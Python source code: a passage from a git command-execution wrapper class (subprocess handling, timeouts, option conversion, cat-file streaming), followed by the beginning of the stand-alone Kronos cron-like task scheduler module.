bytes_left = self._size - self._nbr
if bytes_left:
# read and discard - seeking is impossible within a stream
# includes terminating newline
self._stream.read(bytes_left + 1)
# END handle incomplete read
def __init__(self, working_dir: Union[None, PathLike] = None):
"""Initialize this instance with:
:param working_dir:
Git directory we should work in. If None, we always work in the current
directory as returned by os.getcwd().
It is meant to be the working tree directory if available, or the
.git directory in case of bare repositories."""
super(Git, self).__init__()
self._working_dir = expand_path(working_dir)
self._git_options: Union[List[str], Tuple[str, ...]] = ()
self._persistent_git_options: List[str] = []
# Extra environment variables to pass to git commands
self._environment: Dict[str, str] = {}
# cached command slots
self.cat_file_header: Union[None, TBD] = None
self.cat_file_all: Union[None, TBD] = None
def __getattr__(self, name: str) -> Any:
"""A convenience method as it allows to call the command as if it was
an object.
:return: Callable object that will execute call _call_process with your arguments."""
if name[0] == "_":
return LazyMixin.__getattr__(self, name)
return lambda *args, **kwargs: self._call_process(name, *args, **kwargs)
def set_persistent_git_options(self, **kwargs: Any) -> None:
"""Specify command line options to the git executable
for subsequent subcommand calls
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
"""
self._persistent_git_options = self.transform_kwargs(split_single_char_options=True, **kwargs)
def _set_cache_(self, attr: str) -> None:
if attr == "_version_info":
# We only use the first 4 numbers, as everything else could be strings in fact (on windows)
process_version = self._call_process("version") # should be as default *args and **kwargs used
version_numbers = process_version.split(" ")[2]
self._version_info = cast(
Tuple[int, int, int, int],
tuple(int(n) for n in version_numbers.split(".")[:4] if n.isdigit()),
)
else:
super(Git, self)._set_cache_(attr)
# END handle version info
@property
def working_dir(self) -> Union[None, PathLike]:
""":return: Git directory we are working on"""
return self._working_dir
@property
def version_info(self) -> Tuple[int, int, int, int]:
"""
:return: tuple(int, int, int, int) tuple with integers representing the major, minor
and additional version numbers as parsed from git version.
This value is generated on demand and is cached"""
return self._version_info
@overload
def execute(self, command: Union[str, Sequence[Any]], *, as_process: Literal[True]) -> "AutoInterrupt":
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
as_process: Literal[False] = False,
stdout_as_string: Literal[True],
) -> Union[str, Tuple[int, str, str]]:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
as_process: Literal[False] = False,
stdout_as_string: Literal[False] = False,
) -> Union[bytes, Tuple[int, bytes, str]]:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
with_extended_output: Literal[False],
as_process: Literal[False],
stdout_as_string: Literal[True],
) -> str:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
with_extended_output: Literal[False],
as_process: Literal[False],
stdout_as_string: Literal[False],
) -> bytes:
...
def execute(
self,
command: Union[str, Sequence[Any]],
istream: Union[None, BinaryIO] = None,
with_extended_output: bool = False,
with_exceptions: bool = True,
as_process: bool = False,
output_stream: Union[None, BinaryIO] = None,
stdout_as_string: bool = True,
kill_after_timeout: Union[None, float] = None,
with_stdout: bool = True,
universal_newlines: bool = False,
shell: Union[None, bool] = None,
env: Union[None, Mapping[str, str]] = None,
max_chunk_size: int = io.DEFAULT_BUFFER_SIZE,
strip_newline_in_stdout: bool = True,
**subprocess_kwargs: Any,
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], AutoInterrupt]:
"""Handles executing the command on the shell and consumes and returns
the returned information (stdout)
:param command:
The command argument list to execute.
It should be a string, or a sequence of program arguments. The
program to execute is the first item in the args sequence or string.
:param istream:
Standard input filehandle passed to subprocess.Popen.
:param with_extended_output:
Whether to return a (status, stdout, stderr) tuple.
:param with_exceptions:
Whether to raise an exception when git returns a non-zero status.
:param as_process:
Whether to return the created process instance directly from which
streams can be read on demand. This will render with_extended_output and
with_exceptions ineffective - the caller will have
to deal with the details himself.
It is important to note that the process will be placed into an AutoInterrupt
wrapper that will interrupt the process once it goes out of scope. If you
use the command in iterators, you should pass the whole process instance
instead of a single stream.
:param output_stream:
If set to a file-like object, data produced by the git command will be
output to the given stream directly.
This feature only has any effect if as_process is False. Processes will
always be created with a pipe due to issues with subprocess.
This merely is a workaround as data will be copied from the
output pipe to the given output stream directly.
Judging from the implementation, you shouldn't use this flag !
:param stdout_as_string:
if False, the commands standard output will be bytes. Otherwise, it will be
decoded into a string using the default encoding (usually utf-8).
The latter can fail, if the output contains binary data.
:param env:
A dictionary of environment variables to be passed to `subprocess.Popen`.
:param max_chunk_size:
Maximum number of bytes in one chunk of data passed to the output_stream in
one invocation of write() method. If the given number is not positive then
the default value is used.
:param subprocess_kwargs:
Keyword arguments to be passed to subprocess.Popen. Please note that
some of the valid kwargs are already set by this method, the ones you
specify may not be the same ones.
:param with_stdout: If True, default True, we open stdout on the created process
:param universal_newlines:
if True, pipes will be opened as text, and lines are split at
all known line endings.
:param shell:
Whether to invoke commands through a shell (see `Popen(..., shell=True)`).
It overrides :attr:`USE_SHELL` if it is not `None`.
:param kill_after_timeout:
To specify a timeout in seconds for the git command, after which the process
should be killed. This will have no effect if as_process is set to True. It is
set to None by default and will let the process run until the timeout is
explicitly specified. This feature is not supported on Windows. It's also worth
noting that kill_after_timeout uses SIGKILL, which can have negative side
effects on a repository. For example, stale locks in case of git gc could
render the repository incapable of accepting changes until the lock is manually
removed.
:param strip_newline_in_stdout:
Whether to strip the trailing `\n` of the command stdout.
:return:
* str(output) if extended_output = False (Default)
* tuple(int(status), str(stdout), str(stderr)) if extended_output = True
if output_stream is True, the stdout value will be your output stream:
* output_stream if extended_output = False
* tuple(int(status), output_stream, str(stderr)) if extended_output = True
Note git is executed with LC_MESSAGES="C" to ensure consistent
output regardless of system language.
:raise GitCommandError:
:note:
If you add additional keyword arguments to the signature of this method,
you must update the execute_kwargs tuple housed in this module."""
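        # Illustrative call (a sketch, not from this docstring):
        #   self.execute(["git", "rev-parse", "HEAD"])
        # returns the decoded stdout, while as_process=True would instead return an
        # AutoInterrupt wrapper around the still-running process.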
# Remove password for the command if present
redacted_command = remove_password_if_present(command)
if self.GIT_PYTHON_TRACE and (self.GIT_PYTHON_TRACE != "full" or as_process):
log.info(" ".join(redacted_command))
# Allow the user to have the command executed in their working dir.
try:
cwd = self._working_dir or os.getcwd() # type: Union[None, str]
if not os.access(str(cwd), os.X_OK):
cwd = None
except FileNotFoundError:
cwd = None
# Start the process
inline_env = env
env = os.environ.copy()
# Attempt to force all output to plain ascii english, which is what some parsing code
# may expect.
# According to stackoverflow (http://goo.gl/l74GC8), we are setting LANGUAGE as well
# just to be sure.
env["LANGUAGE"] = "C"
env["LC_ALL"] = "C"
env.update(self._environment)
if inline_env is not None:
env.update(inline_env)
if is_win:
cmd_not_found_exception = OSError
if kill_after_timeout is not None:
raise GitCommandError(
redacted_command,
'"kill_after_timeout" feature is not supported on Windows.',
)
else:
cmd_not_found_exception = FileNotFoundError # NOQA # exists, flake8 unknown @UndefinedVariable
# end handle
stdout_sink = PIPE if with_stdout else getattr(subprocess, "DEVNULL", None) or open(os.devnull, "wb")
istream_ok = "None"
if istream:
istream_ok = "<valid stream>"
log.debug(
"Popen(%s, cwd=%s, universal_newlines=%s, shell=%s, istream=%s)",
redacted_command,
cwd,
universal_newlines,
shell,
istream_ok,
)
try:
proc = Popen(
command,
env=env,
cwd=cwd,
bufsize=-1,
stdin=istream or DEVNULL,
stderr=PIPE,
stdout=stdout_sink,
shell=shell is not None and shell or self.USE_SHELL,
close_fds=is_posix, # unsupported on windows
universal_newlines=universal_newlines,
creationflags=PROC_CREATIONFLAGS,
**subprocess_kwargs,
)
except cmd_not_found_exception as err:
raise GitCommandNotFound(redacted_command, err) from err
else:
# replace with a typeguard for Popen[bytes]?
proc.stdout = cast(BinaryIO, proc.stdout)
proc.stderr = cast(BinaryIO, proc.stderr)
if as_process:
return self.AutoInterrupt(proc, command)
def _kill_process(pid: int) -> None:
"""Callback method to kill a process."""
p = Popen(
["ps", "--ppid", str(pid)],
stdout=PIPE,
creationflags=PROC_CREATIONFLAGS,
)
child_pids = []
if p.stdout is not None:
for line in p.stdout:
if len(line.split()) > 0:
local_pid = (line.split())[0]
if local_pid.isdigit():
child_pids.append(int(local_pid))
try:
# Windows does not have SIGKILL, so use SIGTERM instead
sig = getattr(signal, "SIGKILL", signal.SIGTERM)
os.kill(pid, sig)
for child_pid in child_pids:
try:
os.kill(child_pid, sig)
except OSError:
pass
kill_check.set() # tell the main routine that the process was killed
except OSError:
# It is possible that the process gets completed in the duration after timeout
# happens and before we try to kill the process.
pass
return
# end
if kill_after_timeout is not None:
kill_check = threading.Event()
watchdog = threading.Timer(kill_after_timeout, _kill_process, args=(proc.pid,))
# Wait for the process to return
status = 0
stdout_value: Union[str, bytes] = b""
stderr_value: Union[str, bytes] = b""
newline = "\n" if universal_newlines else b"\n"
try:
if output_stream is None:
if kill_after_timeout is not None:
watchdog.start()
stdout_value, stderr_value = proc.communicate()
if kill_after_timeout is not None:
watchdog.cancel()
if kill_check.is_set():
stderr_value = 'Timeout: the command "%s" did not complete in %d ' "secs." % (
" ".join(redacted_command),
kill_after_timeout,
)
if not universal_newlines:
stderr_value = stderr_value.encode(defenc)
# strip trailing "\n"
if stdout_value.endswith(newline) and strip_newline_in_stdout: # type: ignore
stdout_value = stdout_value[:-1]
if stderr_value.endswith(newline): # type: ignore
stderr_value = stderr_value[:-1]
status = proc.returncode
else:
max_chunk_size = max_chunk_size if max_chunk_size and max_chunk_size > 0 else io.DEFAULT_BUFFER_SIZE
stream_copy(proc.stdout, output_stream, max_chunk_size)
stdout_value = proc.stdout.read()
stderr_value = proc.stderr.read()
# strip trailing "\n"
if stderr_value.endswith(newline): # type: ignore
stderr_value = stderr_value[:-1]
status = proc.wait()
# END stdout handling
finally:
proc.stdout.close()
proc.stderr.close()
if self.GIT_PYTHON_TRACE == "full":
cmdstr = " ".join(redacted_command)
def as_text(stdout_value: Union[bytes, str]) -> str:
return not output_stream and safe_decode(stdout_value) or "<OUTPUT_STREAM>"
# end
if stderr_value:
log.info(
"%s -> %d; stdout: '%s'; stderr: '%s'",
cmdstr,
status,
as_text(stdout_value),
safe_decode(stderr_value),
)
elif stdout_value:
log.info("%s -> %d; stdout: '%s'", cmdstr, status, as_text(stdout_value))
else:
log.info("%s -> %d", cmdstr, status)
# END handle debug printing
if with_exceptions and status != 0:
raise GitCommandError(redacted_command, status, stderr_value, stdout_value)
if isinstance(stdout_value, bytes) and stdout_as_string: # could also be output_stream
stdout_value = safe_decode(stdout_value)
# Allow access to the command's status code
if with_extended_output:
return (status, stdout_value, safe_decode(stderr_value))
else:
return stdout_value
def environment(self) -> Dict[str, str]:
return self._environment
def update_environment(self, **kwargs: Any) -> Dict[str, Union[str, None]]:
"""
Set environment variables for future git invocations. Return all changed
values in a format that can be passed back into this function to revert
the changes:
``Examples``::
old_env = self.update_environment(PWD='/tmp')
self.update_environment(**old_env)
:param kwargs: environment variables to use for git processes
:return: dict that maps environment variables to their old values
"""
old_env = {}
for key, value in kwargs.items():
            # set value if it is not None
if value is not None:
old_env[key] = self._environment.get(key)
self._environment[key] = value
# remove key from environment if its value is None
elif key in self._environment:
old_env[key] = self._environment[key]
del self._environment[key]
return old_env
@contextmanager
def custom_environment(self, **kwargs: Any) -> Iterator[None]:
"""
A context manager around the above ``update_environment`` method to restore the
environment back to its previous state after operation.
``Examples``::
with self.custom_environment(GIT_SSH='/bin/ssh_wrapper'):
repo.remotes.origin.fetch()
:param kwargs: see update_environment
"""
old_env = self.update_environment(**kwargs)
try:
yield
finally:
self.update_environment(**old_env)
def transform_kwarg(self, name: str, value: Any, split_single_char_options: bool) -> List[str]:
if len(name) == 1:
if value is True:
return ["-%s" % name]
elif value not in (False, None):
if split_single_char_options:
return ["-%s" % name, "%s" % value]
else:
return ["-%s%s" % (name, value)]
else:
if value is True:
return ["--%s" % dashify(name)]
elif value is not False and value is not None:
return ["--%s=%s" % (dashify(name), value)]
return []
def transform_kwargs(self, split_single_char_options: bool = True, **kwargs: Any) -> List[str]:
"""Transforms Python style kwargs into git command line options."""
args = []
for k, v in kwargs.items():
if isinstance(v, (list, tuple)):
for value in v:
args += self.transform_kwarg(k, value, split_single_char_options)
else:
args += self.transform_kwarg(k, v, split_single_char_options)
return args
@classmethod
def __unpack_args(cls, arg_list: Sequence[str]) -> List[str]:
outlist = []
if isinstance(arg_list, (list, tuple)):
for arg in arg_list:
outlist.extend(cls.__unpack_args(arg))
else:
outlist.append(str(arg_list))
return outlist
def __call__(self, **kwargs: Any) -> "Git":
"""Specify command line options to the git executable
for a subcommand call
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
``Examples``::
git(work_tree='/tmp').difftool()"""
self._git_options = self.transform_kwargs(split_single_char_options=True, **kwargs)
return self
@overload
def _call_process(self, method: str, *args: None, **kwargs: None) -> str:
... # if no args given, execute called with all defaults
@overload
def _call_process(
self,
method: str,
istream: int,
as_process: Literal[True],
*args: Any,
**kwargs: Any,
) -> "Git.AutoInterrupt":
...
@overload
def _call_process(
self, method: str, *args: Any, **kwargs: Any
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], "Git.AutoInterrupt"]:
...
def _call_process(
self, method: str, *args: Any, **kwargs: Any
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], "Git.AutoInterrupt"]:
"""Run the given git command with the specified arguments and return
the result as a String
:param method:
is the command. Contained "_" characters will be converted to dashes,
such as in 'ls_files' to call 'ls-files'.
:param args:
is the list of arguments. If None is included, it will be pruned.
This allows your commands to call git more conveniently as None
is realized as non-existent
:param kwargs:
It contains key-values for the following:
- the :meth:`execute()` kwds, as listed in :var:`execute_kwargs`;
- "command options" to be converted by :meth:`transform_kwargs()`;
- the `'insert_kwargs_after'` key which its value must match one of ``*args``
and any cmd-options will be appended after the matched arg.
Examples::
git.rev_list('master', max_count=10, header=True)
turns into::
            git rev-list --max-count=10 --header master
:return: Same as ``execute``
            If no args are given, ``execute`` is used with its defaults
            (as_process=False, stdout_as_string=True) and a str is returned."""
# Handle optional arguments prior to calling transform_kwargs
# otherwise these'll end up in args, which is bad.
exec_kwargs = {k: v for k, v in kwargs.items() if k in execute_kwargs}
opts_kwargs = {k: v for k, v in kwargs.items() if k not in execute_kwargs}
insert_after_this_arg = opts_kwargs.pop("insert_kwargs_after", None)
# Prepare the argument list
opt_args = self.transform_kwargs(**opts_kwargs)
ext_args = self.__unpack_args([a for a in args if a is not None])
if insert_after_this_arg is None:
args_list = opt_args + ext_args
else:
try:
index = ext_args.index(insert_after_this_arg)
except ValueError as err:
raise ValueError(
"Couldn't find argument '%s' in args %s to insert cmd options after"
% (insert_after_this_arg, str(ext_args))
) from err
# end handle error
args_list = ext_args[: index + 1] + opt_args + ext_args[index + 1 :]
# end handle opts_kwargs
call = [self.GIT_PYTHON_GIT_EXECUTABLE]
# add persistent git options
call.extend(self._persistent_git_options)
# add the git options, then reset to empty
# to avoid side_effects
call.extend(self._git_options)
self._git_options = ()
call.append(dashify(method))
call.extend(args_list)
return self.execute(call, **exec_kwargs)
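# Illustrative sketch (not part of the original source): `insert_kwargs_after`
# places the transformed options after the matching positional argument, e.g.
#   git.remote("update", "origin", insert_kwargs_after="update", prune=True)
# is assumed to build roughly: git remote update --prune origin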
def _parse_object_header(self, header_line: str) -> Tuple[str, str, int]:
"""
:param header_line:
<hex_sha> type_string size_as_int
:return: (hex_sha, type_string, size_as_int)
:raise ValueError: if the header contains indication for an error due to
incorrect input sha"""
tokens = header_line.split()
if len(tokens) != 3:
if not tokens:
raise ValueError("SHA could not be resolved, git returned: %r" % (header_line.strip()))
else:
raise ValueError("SHA %s could not be resolved, git returned: %r" % (tokens[0], header_line.strip()))
# END handle actual return value
# END error handling
if len(tokens[0]) != 40:
raise ValueError("Failed to parse header: %r" % header_line)
return (tokens[0], tokens[1], int(tokens[2]))
def _prepare_ref(self, ref: AnyStr) -> bytes:
# required for command to separate refs on stdin, as bytes
if isinstance(ref, bytes):
# Assume 40 bytes hexsha - bin-to-ascii for some reason returns bytes, not text
refstr: str = ref.decode("ascii")
elif not isinstance(ref, str):
refstr = str(ref) # could be ref-object
else:
refstr = ref
if not refstr.endswith("\n"):
refstr += "\n"
return refstr.encode(defenc)
def _get_persistent_cmd(self, attr_name: str, cmd_name: str, *args: Any, **kwargs: Any) -> "Git.AutoInterrupt":
cur_val = getattr(self, attr_name)
if cur_val is not None:
return cur_val
options = {"istream": PIPE, "as_process": True}
options.update(kwargs)
cmd = self._call_process(cmd_name, *args, **options)
setattr(self, attr_name, cmd)
cmd = cast("Git.AutoInterrupt", cmd)
return cmd
def __get_object_header(self, cmd: "Git.AutoInterrupt", ref: AnyStr) -> Tuple[str, str, int]:
if cmd.stdin and cmd.stdout:
cmd.stdin.write(self._prepare_ref(ref))
cmd.stdin.flush()
return self._parse_object_header(cmd.stdout.readline())
else:
raise ValueError("cmd stdin was empty")
def get_object_header(self, ref: str) -> Tuple[str, str, int]:
"""Use this method to quickly examine the type and size of the object behind
the given ref.
:note: The method will only suffer from the costs of command invocation
once and reuses the command in subsequent calls.
:return: (hexsha, type_string, size_as_int)"""
cmd = self._get_persistent_cmd("cat_file_header", "cat_file", batch_check=True)
return self.__get_object_header(cmd, ref)
def get_object_data(self, ref: str) -> Tuple[str, str, int, bytes]:
"""As get_object_header, but returns object data as well
:return: (hexsha, type_string, size_as_int,data_string)
:note: not threadsafe"""
hexsha, typename, size, stream = self.stream_object_data(ref)
data = stream.read(size)
del stream
return (hexsha, typename, size, data)
def stream_object_data(self, ref: str) -> Tuple[str, str, int, "Git.CatFileContentStream"]:
"""As get_object_header, but returns the data as a stream
:return: (hexsha, type_string, size_as_int, stream)
:note: This method is not threadsafe; you need one independent Command instance per thread to be safe!"""
cmd = self._get_persistent_cmd("cat_file_all", "cat_file", batch=True)
hexsha, typename, size = self.__get_object_header(cmd, ref)
cmd_stdout = cmd.stdout if cmd.stdout is not None else io.BytesIO()
return (hexsha, typename, size, self.CatFileContentStream(size, cmd_stdout))
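# Illustrative usage sketch (assumed, not part of the original source): both helpers
# reuse one persistent `git cat-file` child process across calls, e.g.
#   hexsha, type_string, size = git.get_object_header("HEAD")
#   hexsha, type_string, size, stream = git.stream_object_data("HEAD")
#   data = stream.read(size)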
def clear_cache(self) -> "Git":
"""Clear all kinds of internal caches to release resources.
Currently persistent commands will be interrupted.
:return: self"""
for cmd in (self.cat_file_all, self.cat_file_header):
if cmd:
cmd.__del__()
self.cat_file_all = None
self.cat_file_header = None
return self
|
scheduler.py
|
# coding=utf-8
"""Module that provides a cron-like task scheduler.
This task scheduler is designed to be used from inside your own program.
You can schedule Python functions to be called at specific intervals or
days. It uses the standard 'sched' module for the actual task scheduling,
but provides much more:
* repeated tasks (at intervals, or on specific days)
* error handling (exceptions in tasks don't kill the scheduler)
* optional to run scheduler in its own thread or separate process
* optional to run a task in its own thread or separate process
If the threading module is available, you can use the various Threaded
variants of the scheduler and associated tasks. If threading is not
available, you could still use the forked variants. If fork is also
not available, all processing is done in a single process, sequentially.
There are three Scheduler classes:
Scheduler ThreadedScheduler ForkedScheduler
You usually add new tasks to a scheduler using the add_interval_task or
add_daytime_task methods, with the appropriate processmethod argument
to select sequential, threaded or forked processing. NOTE: it is impossible
to add new tasks to a ForkedScheduler, after the scheduler has been started!
For more control you can use one of the following Task classes
and use schedule_task or schedule_task_abs:
IntervalTask ThreadedIntervalTask ForkedIntervalTask
SingleTask ThreadedSingleTask ForkedSingleTask
WeekdayTask ThreadedWeekdayTask ForkedWeekdayTask
MonthdayTask ThreadedMonthdayTask ForkedMonthdayTask
Kronos is the Greek God of Time.
Kronos scheduler (c) Irmen de Jong.
This version has been extracted from the Turbogears source repository
and slightly changed to be completely stand-alone again. Also some fixes
have been made to make it work on Python 2.6 (sched module changes).
The version in Turbogears is based on the original stand-alone Kronos.
This is open-source software, released under the MIT Software License:
http://www.opensource.org/licenses/mit-license.php
"""
__version__ = "2.0"
__all__ = [
"DayTaskRescheduler",
"ForkedIntervalTask",
"ForkedMonthdayTask",
"ForkedScheduler",
"ForkedSingleTask",
"ForkedTaskMixin",
"ForkedWeekdayTask",
"IntervalTask",
"MonthdayTask",
"Scheduler",
"SingleTask",
"Task",
"ThreadedIntervalTask",
"ThreadedMonthdayTask",
"ThreadedScheduler",
"ThreadedSingleTask",
"ThreadedTaskMixin",
"ThreadedWeekdayTask",
"WeekdayTask",
]
import os
import sys
import sched
import time
import traceback
import weakref
class method:
sequential = "sequential"
forked = "forked"
threaded = "threaded"
class Scheduler:
"""The Scheduler itself."""
def __init__(self):
self.running = True
self.sched = sched.scheduler(time.time, self.__delayfunc)
def __delayfunc(self, delay):
# This delay function is basically a time.sleep() that is
# divided up, so that we can check the self.running flag while
# delaying. There is an additional check in here to ensure that the
# top item of the queue hasn't changed
if delay < 10:
time.sleep(delay)
else:
toptime = self._getqueuetoptime()
endtime = time.time() + delay
period = 5
stoptime = endtime - period
while (self.running
and stoptime > time.time()
and self._getqueuetoptime() == toptime):
time.sleep(period)
if not self.running or self._getqueuetoptime() != toptime:
return
now = time.time()
if endtime > now:
time.sleep(endtime - now)
def _acquire_lock(self):
pass
def _release_lock(self):
pass
def add_interval_task(self, action, taskname, initialdelay, interval,
processmethod, args, kw, abs=False):
"""Add a new Interval Task to the schedule.
A very short initialdelay or one of zero cannot be honored; you will
see a slight delay before the task is first executed. This is because
the scheduler needs to pick it up in its loop.
"""
if initialdelay < 0 or interval < 1:
raise ValueError("Delay or interval must be >0")
# Select the correct IntervalTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = IntervalTask
elif processmethod == method.threaded:
TaskClass = ThreadedIntervalTask
elif processmethod == method.forked:
TaskClass = ForkedIntervalTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, interval, action, args, kw, abs)
self.schedule_task(task, initialdelay)
return task
def add_single_task(self, action, taskname, initialdelay, processmethod,
args, kw):
"""Add a new task to the scheduler that will only be executed once."""
if initialdelay < 0:
raise ValueError("Delay must be >0")
# Select the correct SingleTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = SingleTask
elif processmethod == method.threaded:
TaskClass = ThreadedSingleTask
elif processmethod == method.forked:
TaskClass = ForkedSingleTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_daytime_task(self, action, taskname, weekdays, monthdays,
timeonday, processmethod, args, kw):
"""Add a new Day Task (Weekday or Monthday) to the schedule."""
if weekdays and monthdays:
raise ValueError("You can only specify weekdays or monthdays, "
"not both")
if not args:
args = []
if not kw:
kw = {}
if weekdays:
# Select the correct WeekdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = WeekdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedWeekdayTask
elif processmethod == method.forked:
TaskClass = ForkedWeekdayTask
else:
raise ValueError("Invalid processmethod")
task = TaskClass(taskname, weekdays, timeonday, action, args, kw)
if monthdays:
# Select the correct MonthdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = MonthdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedMonthdayTask
elif processmethod == method.forked:
TaskClass = ForkedMonthdayTask
else:
raise ValueError("Invalid processmethod")
task = TaskClass(taskname, monthdays, timeonday, action, args, kw)
firsttime = task.get_schedule_time(True)
self.schedule_task_abs(task, firsttime)
return task
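# Illustrative sketch (not part of the original Kronos source): scheduling a task
# for every Monday and Friday at 10:30 could look roughly like
#   s = Scheduler()
#   s.add_daytime_task(backup, "backup", (1, 5), None, (10, 30),
#                      method.sequential, None, None)
#   s.start()
# where `backup` is a hypothetical zero-argument callable.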
def schedule_task(self, task, delay):
"""Add a new task to the scheduler with the given delay (seconds).
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),))
finally:
self._release_lock()
else:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),))
def schedule_task_abs(self, task, abstime):
"""Add a new task to the scheduler for the given absolute time value.
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),))
finally:
self._release_lock()
else:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),))
def start(self):
"""Start the scheduler."""
self._run()
def stop(self):
"""Remove all pending tasks and stop the Scheduler."""
self.running = False
self._clearschedqueue()
def cancel(self, task):
"""Cancel given scheduled task."""
self.sched.cancel(task.event)
if sys.version_info >= (2, 6):
# code for sched module of python 2.6+
def _getqueuetoptime(self):
return self.sched._queue[0].time
def _clearschedqueue(self):
self.sched._queue[:] = []
else:
# code for sched module of python 2.5 and older
def _getqueuetoptime(self):
return self.sched.queue[0][0]
def _clearschedqueue(self):
self.sched.queue[:] = []
def _run(self):
# Low-level run method to do the actual scheduling loop.
while self.running:
try:
self.sched.run()
except Exception as x:
    print("ERROR DURING SCHEDULER EXECUTION", x, file=sys.stderr)
    print("".join(traceback.format_exception(*sys.exc_info())), file=sys.stderr)
    print("-" * 20, file=sys.stderr)
# queue is empty; sleep a short while before checking again
if self.running:
time.sleep(5)
class Task:
"""Abstract base class of all scheduler tasks"""
def __init__(self, name, action, args, kw):
"""This is an abstract class!"""
self.name = name
self.action = action
self.args = args
self.kw = kw
def __call__(self, schedulerref):
"""Execute the task action in the scheduler's thread."""
try:
self.execute()
except Exception as x:
    self.handle_exception(x)
self.reschedule(schedulerref())
def reschedule(self, scheduler):
"""This method should be defined in one of the sub classes!"""
raise NotImplementedError("You're using the abstract class 'Task',"
" use a concrete class instead")
def execute(self):
"""Execute the actual task."""
self.action(*self.args, **self.kw)
def handle_exception(self, exc):
    """Handle any exception that occurred during task execution."""
    print("ERROR DURING TASK EXECUTION", exc, file=sys.stderr)
    print("".join(traceback.format_exception(*sys.exc_info())), file=sys.stderr)
    print("-" * 20, file=sys.stderr)
class SingleTask(Task):
"""A task that only runs once."""
def reschedule(self, scheduler):
pass
class IntervalTask(Task):
"""A repeated task that occurs at certain intervals (in seconds)."""
def __init__(self, name, interval, action, args=None, kw=None, abs=False):
Task.__init__(self, name, action, args, kw)
self.absolute = abs
self.interval = interval
self.duration = 0
def execute(self):
""" Execute the actual task."""
start_time = time.time()
self.action(*self.args, **self.kw)
end_time = time.time()
self.duration = int(end_time - start_time)
def reschedule(self, scheduler):
"""Reschedule this task according to its interval (in seconds)."""
if self.absolute and self.duration:
if self.duration < self.interval:
scheduler.schedule_task(self, self.interval - self.duration)
else:
scheduler.schedule_task(self, 0)
else:
scheduler.schedule_task(self, self.interval)
class DayTaskRescheduler:
"""A mixin class that contains the reschedule logic for the DayTasks."""
def __init__(self, timeonday):
self.timeonday = timeonday
def get_schedule_time(self, today):
"""Calculate the time value at which this task is to be scheduled."""
now = list(time.localtime())
if today:
# schedule for today. let's see if that is still possible
if (now[3], now[4]) >= self.timeonday:
# too bad, it will be tomorrow
now[2] += 1
else:
# tomorrow
now[2] += 1
# set new time on day (hour,minute)
now[3], now[4] = self.timeonday
# seconds
now[5] = 0
return time.mktime(now)
def reschedule(self, scheduler):
"""Reschedule this task according to the daytime for the task.
The task is scheduled for tomorrow, for the given daytime.
"""
# (The execute method in the concrete Task classes will check
# if the current day is a day on which the task must run).
abstime = self.get_schedule_time(False)
scheduler.schedule_task_abs(self, abstime)
class WeekdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a week (1-7), at a fixed time
on the day.
"""
def __init__(self, name, weekdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(weekdays) not in (list, tuple):
raise TypeError("weekdays must be a sequence of weekday numbers "
"1-7 (1 is Monday)")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = weekdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the week).
weekday = time.localtime().tm_wday + 1
if weekday in self.days:
self.action(*self.args, **self.kw)
class MonthdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a month (1-31), at a fixed
time on the day.
"""
def __init__(self, name, monthdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(monthdays) not in (list, tuple):
raise TypeError("monthdays must be a sequence of numbers 1-31")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = monthdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the month).
if time.localtime().tm_mday in self.days:
self.action(*self.args, **self.kw)
try:
import threading
class ThreadedScheduler(Scheduler):
"""A Scheduler that runs in its own thread."""
def __init__(self):
Scheduler.__init__(self)
# we require a lock around the task queue
self._lock = threading.Lock()
def start(self):
"""Splice off a thread in which the scheduler will run."""
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
def stop(self):
"""Stop the scheduler and wait for the thread to finish."""
Scheduler.stop(self)
try:
self.thread.join()
except AttributeError:
pass
def _acquire_lock(self):
"""Lock the thread's task queue."""
self._lock.acquire()
def _release_lock(self):
"""Release the lock on th ethread's task queue."""
self._lock.release()
class ThreadedTaskMixin:
"""A mixin class to make a Task execute in a separate thread."""
def __call__(self, schedulerref):
"""Execute the task action in its own thread."""
threading.Thread(target=self.threadedcall).start()
self.reschedule(schedulerref())
def threadedcall(self):
# This method is run within its own thread, so we have to
# do the execute() call and exception handling here.
try:
self.execute()
except Exception as x:
    self.handle_exception(x)
